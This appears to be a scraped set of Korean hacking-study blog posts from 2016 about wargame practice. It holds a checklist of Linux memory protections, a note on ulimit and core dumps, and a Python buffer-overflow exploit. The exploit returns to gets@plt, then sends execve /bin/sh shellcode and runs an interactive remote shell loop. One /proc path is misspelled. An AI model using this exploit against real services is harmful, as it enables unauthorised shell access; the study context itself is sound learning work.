보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.
1. SSP(Stack Smashing Protector)
__stack_chk_fail
2. NX
readelf -l ./vul
실행권한 확인
3. Dummy
gcc -v
2.96 이상부터 더미존재
4. Random Stack
cat /proc/sys/kernel/exex-shield-randomize
1 - O
2 - X
5.Random Library
cat /proc/self/maps
6. ASCII Armor
cat /proc/self/maps
윈도우 메모리 보호 우회 (0) | 2016.10.29 |
---|---|
윈도우 취약점 악용 (0) | 2016.10.29 |
segmentation fault? (0) | 2016.10.04 |
payload? (0) | 2016.09.29 |
System study 근황. (0) | 2016.09.20 |
전에 풀던 LOB를 풀다 생각나서 쓴글.
Q : Lob에선 Core dump가 떠지는데 왜 따른곳에선 안될까요?
B@sh시
// ulimit -c 10000
언리미트는 유저에 대해서 할당되는 자원량에 한계를 정리해주는 명령어 이다.
이걸 사용함으로써 사용자를 기본으로 하는 리눅스 시스템에서 과부하를 막아주는 역할을 한다.
결론은 -c 10000하면 core파일을 생성할 수 있다고 카더라(?..뇌피셜이다.)
윈도우 취약점 악용 (0) | 2016.10.29 |
---|---|
리눅스 보호기법 확인작업 (0) | 2016.10.11 |
payload? (0) | 2016.09.29 |
System study 근황. (0) | 2016.09.20 |
근황. (0) | 2016.09.01 |
from socket import *
import struct
p = lambda x:struct.pack("<L",x)
HOST = "127.0.0.1"
PORT = 8080
gets_plt = 0xffffffff
bss = 0xffffffff
payload ="\x90"*68
payload+=p(gets_plt)
payload+=p(bss)
payload+=p(bss)
s = socket(AF_INET,SOCK_STREAM)
s.connect((HOST,PORT))
s.send(payload +"\n")
s.send("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\n")
while True :
cmd=raw_input("$")
s.send(cmd+"\n")
print s.recv(1024)
s.close()
리눅스 보호기법 확인작업 (0) | 2016.10.11 |
---|---|
segmentation fault? (0) | 2016.10.04 |
System study 근황. (0) | 2016.09.20 |
근황. (0) | 2016.09.01 |
System - Format String Attack 1 (0) | 2016.08.05 |
FC3 정복이 머지않았따.
segmentation fault? (0) | 2016.10.04 |
---|---|
payload? (0) | 2016.09.29 |
근황. (0) | 2016.09.01 |
System - Format String Attack 1 (0) | 2016.08.05 |
생각난김에 쓴 심볼릭 링크 (0) | 2016.07.19 |
write up 쓸 준비를 해야겠다.
// 기초 복습중
payload? (0) | 2016.09.29 |
---|---|
System study 근황. (0) | 2016.09.20 |
System - Format String Attack 1 (0) | 2016.08.05 |
생각난김에 쓴 심볼릭 링크 (0) | 2016.07.19 |
System - Return To Library (0) | 2016.06.30 |